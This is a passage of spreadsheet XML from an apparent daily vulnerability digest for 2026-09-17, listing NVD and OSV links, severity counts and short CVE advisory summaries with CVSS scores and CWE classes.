TargetMode="External" Id="rId22" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45140" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79752" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63472" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63459" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69197" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71538" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86039" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63460" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68523" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68537" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81515" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81516" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85715" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85721" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86038" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86049" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61793" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85717" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81868" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85078" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75523" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85720" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63461" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85999" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86000" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54546" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61700" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85716" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73245" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16255" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16248" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16258" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16249" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16257" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16272" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16266" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16259" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16265" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16256" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16250" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16251" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16252" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16254" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16260" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16261" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16262" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16263" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16264" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16267" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16268" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16269" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16270" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16271" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16273" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16274" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16275" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77360" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59823" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81870" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62949" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63225" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64684" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69147" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77401" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81176" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84997" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85732" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86071" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88976" TargetMode="External" Id="rId95"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2026-09-17</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-17T00:00 to 2026-09-18T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-18 11:29:58 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1102</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>1065</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>37</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>69</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>195</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>133</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>29</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>689</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>64</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>88</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CVE-2026-87886</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@acronis.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Local privilege escalation due to insecure file permissions. The following products are affected: Acronis Backup plugin for cPanel &amp; WHM (Linux) before build 1.9.3.1021, Acronis Backup extension for Plesk (Linux) before build 1.8.11.638, Acronis Backup plugin for DirectAdmin (Linux) before build 1.2.3.238.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54734</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Prebid Server Java is the Java version of Prebid Server. Prior to 3.43.0, certain bidder adapters interpolate user-supplied parameters into outbound request URLs without using HttpUtil to validate the resulting domain or path segment. A malicious actor who can supply bid-request parameters can cause the server to send HTTP requests to unintended destinations, potentially reaching internal network services, metadata endpoints, or other sensitive server endpoints with the server's network access. This issue is fixed in version 3.43.0.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54734</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62104</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in Migratico Lite &lt;= 2.6.8 versions.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62104</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69399</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2026-09-17</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Azure Arc Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69399</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69865</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2026-09-17</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Container Registry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69865</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70200</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-285</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70200</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83944</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83944</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85889</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
